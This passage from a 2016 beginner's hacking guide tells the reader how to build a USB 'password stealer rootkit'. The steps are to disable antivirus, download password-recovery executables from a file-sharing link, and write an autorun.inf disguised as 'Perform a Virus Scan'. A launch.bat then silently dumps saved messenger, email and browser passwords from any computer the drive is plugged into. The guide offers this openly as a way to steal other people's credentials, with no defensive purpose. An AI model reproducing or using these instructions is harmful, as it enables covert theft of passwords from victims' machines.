Hack Passwords Using Pendrive USB Stealer
We all know,
Windows stores most of the passwords which are used on a daily basis,
including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger
etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There
exists many tools for recovering these passswords from their stored places. Using these
tools and a USB pen-drive, you can create your own rootkit to steal passwords from any
computer. You need to follow these steps to make your own password stealing rootkits.
You must temporarily disable the antivirus before following these steps.
1. Download the set of tools, extract them and copy all files (.exe) into your USB
Pendrive.
Download Password Stealer From Here
:
http://www86.zippyshare.com/v/Dy3oseUc/file.html
2.
Create a new Notepad and write the following text into it.
[autorun] open=launch.bat
ACTION= Perform a Virus Scan
3.
Save the Notepad and rename it from New Text Document.txt to autorun.inf
4.
Copy the autorun.inf file onto your USB pen-drive.
5. Create another Notepad and write the following text in it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat.
Copy the
launch.bat file to your USB drive.
H4CK3R : A Beginner’s Guide 2016
Page 35
Now our rootkit is ready and we are all set to sniff the passwords.
You can use this pendrive on on any computer to steal the stored passwords.
Now, Insert the pen-drive and the auto-run window will pop-up.
(This is because, we
have created an auto-run pen-drive). In the pop-up window, select the first option
(Perform a Virus Scan).
Now all the password recovery tools will silently get executed
in the background (This process takes hardly a few seconds).
The passwords get stored
in the .
TXT files. Remove the pen-drive and you’ll see the stored passwords in the .
TXT
files and Use The Passwords..